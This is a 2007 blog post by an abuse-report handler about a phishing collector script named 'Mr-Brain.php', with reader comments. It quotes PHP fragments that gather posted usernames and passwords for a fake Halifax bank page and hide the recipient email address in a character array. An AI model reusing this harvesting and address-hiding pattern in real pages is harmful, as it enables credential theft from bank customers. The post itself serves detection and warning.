PreshBlog

Watch out for “Mr-Brain.php” – phishing script

by on May.02, 2007, under Information Security

As well as my normal development duties I deal with some of the incoming abuse reports at work, and recently I’ve dealt with a number of phishing sites which submit data to a script named “Mr-Brain.php”. A quick Google showed no useful results, so I’m posting about it here.

The script gathers the details submitted by the phishing site and emails them off. The actual file seems to change a bit for each spam.

Tell-tail bits from one of them:


$message .= "--------------HaLiFaX UK Bank Spam ReZulT-----------------------\n";
$message .= "Username: ".$_POST['Username']."\n";
$message .= "Password: ".$_POST['Password']."\n";
[..... removed some lines for brevity.....]
$message .= "---------------Created By yassine.h01------------------------------\n";

It also makes a pretty laughable attempt to hide what email address it’s really sending the info to, by picking characters out of an array:


$ar=array("0"=>"3","1"=>"a","2"=>"w","3"=>"l","4"=>"d","5"=>"i","6"=>"@","7"=>".","8"=>"y","9"=>"h","10"=>"o","11"=>"c","12"=>"m");
$to=$ar['1'].$ar['2'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['0'].$ar['0'].$ar['0'].$ar['6'].$ar['8'].$ar['1'].$ar['9'].$ar['10'].$ar['10'].$ar['7']
.$ar['11'].$ar['10'].$ar['12'];

… because that will really stop anyone with half a clue seeing what’s going on.

Might well be worth searching your servers for any files named “Mr-Brain.php” as a quick way to locate phishing attempts. A quick find / -name Mr-Brain.php will get you a list of any dodgy sites being hosted, quickly and easily.

A quick Google for “yassine.h01” returned a site hosting a large list of pre-made phishing sites… just unzip, change the Mr-Brain.php file with your address, and upload. Reported it, but it’s a Russian host, so not holding my breath.

Have any info to add? Go ahead and leave a comment (please!).


6 Comments for this entry

  • bigpresh

    Another similar looking script I found was named Sitekey.php which was part of a Bank of America phishing site… it looks like it’s either made by the same person, or just modified by someone. It contains “Created By xXMr_SpAmErSxX” in the mail it sends.

    I also saw one called log.php which it seems is designed to steal Hotmail cookies, containing “abdullah00” and “By Mr.ALJoOoKeR”.

  • bigpresh

    Still seeing more Mr-Brain.php scripts, often with different “Created By” lines, including:
    —————Created BY Mr-c/qadir——————————

  • bigpresh

    Update: Googling for “yassine.h01” no longer returns the site hosting pre-made phishing sites, so maybe the host acted on the report and took it down.

  • ShopShield

    Identity theft is certainly a very real thing to deal with and the internet only makes it easier to become a victim. Email phishing scams are everywhere and most people can’t tell the difference between a real site and the fake one. I found this new resource called ShopShield.net. Check it out they protect your identity while you are online.

  • Hos

    Hey Buddy Can You Plz Give me PHishing Page For Gmail

    Or Send me a script.

    I ‘m an amateur .So plz Help me

  • David Precious

    @Hos – Heh. Oh dear.

    Here’s your script:


    < ?php echo("Go fuck yourself."); ?>

    /me shakes head in disgust.

1 Trackback or Pingback for this entry

Leave a Reply

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!